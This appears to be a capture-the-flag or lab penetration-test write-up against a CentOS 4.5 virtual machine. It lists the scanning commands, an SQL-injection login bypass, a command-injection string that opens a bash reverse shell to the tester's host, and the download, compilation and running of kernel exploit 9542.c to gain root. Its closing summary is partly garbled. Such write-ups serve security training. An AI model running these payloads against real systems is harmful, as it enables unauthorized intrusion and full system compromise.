Press enter or click to view image in full size
Target System: 192.168.133.142
Operating System: CentOS release 4.5 (Final)
Tool Used: arp-scan
Command:
sudo arp-scan -l
Press enter or click to view image in full size
Findings:
Discovered the target machine on the local network:
Tool Used: nmap
Command:
nmap -sV -O 192.168.133.142
Results:
Press enter or click to view image in full size
OS Identified: Linux 2.6.X (CentOS 4.5)
Tool Used: Searchsploit
Command:
searchsploit Apache 2.0.52
Press enter or click to view image in full size
Findings:
Observed Page: Remote System Administration Login
Payload Used:
Username: admin'--
Password: (blank)
Result: Successful login → indicates SQL Injection vulnerability
Press enter or click to view image in full size
Observed Page: Ping utility
Vulnerability: Input not sanitized → allows command injection
Listener Setup:
nc -nlvp 3000
Command Injection Used (via ping form or web shell):
192.168.133.140;bash -i >& /dev/tcp/192.168.133.140/3000 0>&1
Press enter or click to view image in full size
Result: Reverse shell established as:
id
# uid=48(apache) gid=48(apache) groups=48(apache)
System Info:
cat /etc/*-release
# CentOS release 4.5 (Final)
python -m http.server 80
Press enter or click to view image in full size
Exploit Used: Exploit code 9542.c
(likely kernel local privilege escalation)
Steps:
cd /var/tmp/
wget http://192.168.133.140:80/9542.c
gcc 9542.c -o exploit
chmod 777 exploit
./exploit
Press enter or click to view image in full size
Result:
id
# uid=0(root) gid=0(root) groups=48(apache)
🟢 Root shell successfully obtained.
The penetration test against the target machine 192.168.133.142 successfully demonstrated multiple critical security weaknesses that could be exploited by an attacker to gain full control of the system.
Key conclusions:
apache
user privileges.✅ Root access obtained: Full system compromise.